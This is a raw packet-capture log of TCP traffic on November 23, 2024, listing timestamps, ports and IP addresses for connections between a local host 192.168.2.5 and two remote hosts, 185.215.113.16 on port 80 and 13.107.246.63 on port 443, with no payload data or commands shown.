                                                                                                                                                                          Nov 23, 2024 19:01:38.299124956 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.299169064 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.299990892 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.300008059 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.300055027 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.301017046 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.301121950 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.301167011 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.302015066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.302125931 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.302166939 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.302984953 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.355482101 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.396944046 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.414674044 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.414853096 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.414907932 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.415056944 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.415074110 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.415097952 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.415102959 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.415183067 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.415379047 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.415440083 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.416440964 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.416484118 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.416518927 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.416533947 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.419742107 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.419780970 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.419889927 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.420464993 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.420485020 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.421192884 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.421227932 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.421283007 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.421495914 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.421509981 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.427448034 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.427515984 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.427572966 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.427696943 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.427696943 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.427709103 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.427719116 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.430782080 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.430794954 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.430849075 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.431123972 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.431135893 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.451246023 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.451324940 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.451371908 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.451714039 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.451801062 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.451849937 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.452799082 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.452826977 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.452878952 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.453769922 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.453929901 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.453980923 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.454791069 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.454880953 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.454925060 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.455781937 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.455874920 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.455919981 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.456779957 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.456933975 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.456978083 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.457845926 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.457947969 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.458034992 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.458820105 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.458920956 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.458972931 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.459831953 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.459918022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.460053921 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.460839987 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.460962057 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.461118937 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.461850882 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.462022066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.462085962 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.462841988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.462964058 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.463006020 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.463884115 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.464019060 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.464078903 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.464962959 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.465146065 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.465198994 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.465893030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.466042042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.466093063 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.466943026 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.466995955 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.467035055 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.467962980 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.468128920 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.468208075 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.468947887 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.469067097 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.469108105 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.470096111 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.470235109 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.470326900 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.470967054 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.471067905 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.471115112 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.471971035 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.472112894 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.472153902 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.473016977 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.473277092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.473383904 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.474069118 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.474258900 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.474318027 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.475064993 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.475171089 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.475215912 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.476047039 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.476160049 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.476253033 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.477057934 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.477082968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.477139950 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.478071928 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.478214025 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.478260994 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.479080915 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.479187965 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.479290009 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.480086088 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.480190992 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.480232954 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.481106997 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.481261015 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.481307983 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.482119083 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.482250929 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.482290030 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.483158112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.483305931 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.483351946 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.484206915 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.484281063 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.484395027 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.491704941 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.491815090 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.491885900 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.519108057 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.519198895 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.519237995 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.519618988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.519712925 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.519813061 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.521058083 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.521226883 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.521271944 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.521903038 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.521970034 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.522079945 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.523344040 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.523616076 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.523662090 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.524692059 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.524811029 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.524852037 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.525422096 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.525439024 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.525487900 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.526154995 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.526190042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.526236057 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.528949022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529019117 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529035091 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529078960 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.529086113 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529102087 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529119015 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529139996 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.529156923 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.529797077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529901028 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.529953957 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.530796051 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.530899048 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.530951977 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.531795025 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.531903028 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.531980991 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.532824993 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.532943964 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.532998085 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.533801079 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.533874035 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.533931971 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.534815073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.534948111 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.534989119 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.535823107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.535938978 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.535980940 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.536817074 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.589266062 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.652470112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.652610064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.652659893 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.652919054 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.653125048 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.653172970 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.653202057 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.654135942 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.654381037 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.654406071 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.655147076 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.655230999 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.655271053 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.656172991 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.656302929 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.656343937 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.657181025 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.657223940 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.657335997 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.658232927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.658283949 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.658318043 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.659213066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.659252882 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.659260035 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.660212040 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.660253048 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.660325050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.661236048 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.661314011 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.661361933 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.662256002 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.662350893 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.662363052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.663243055 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.663290024 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.663361073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.664282084 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.664344072 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.664467096 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.665347099 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.665396929 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.665426016 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.666363001 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.666415930 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.666527987 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.667308092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.667361975 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.667433023 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.668406963 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.668458939 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.668514013 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.669341087 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.669455051 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.669461966 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.670355082 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.670394897 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.670459032 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.671396971 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.671457052 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.671500921 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.672409058 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.672467947 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.672542095 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.673412085 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.673494101 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.673547029 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.674413919 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.674500942 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.674557924 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.675435066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.675482988 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.675540924 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.676465988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.676558018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.676601887 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.677459955 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.677515984 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.677582979 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.678520918 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.678587914 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.678639889 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.679485083 CET8049738185.215.113.16192.168.2.5
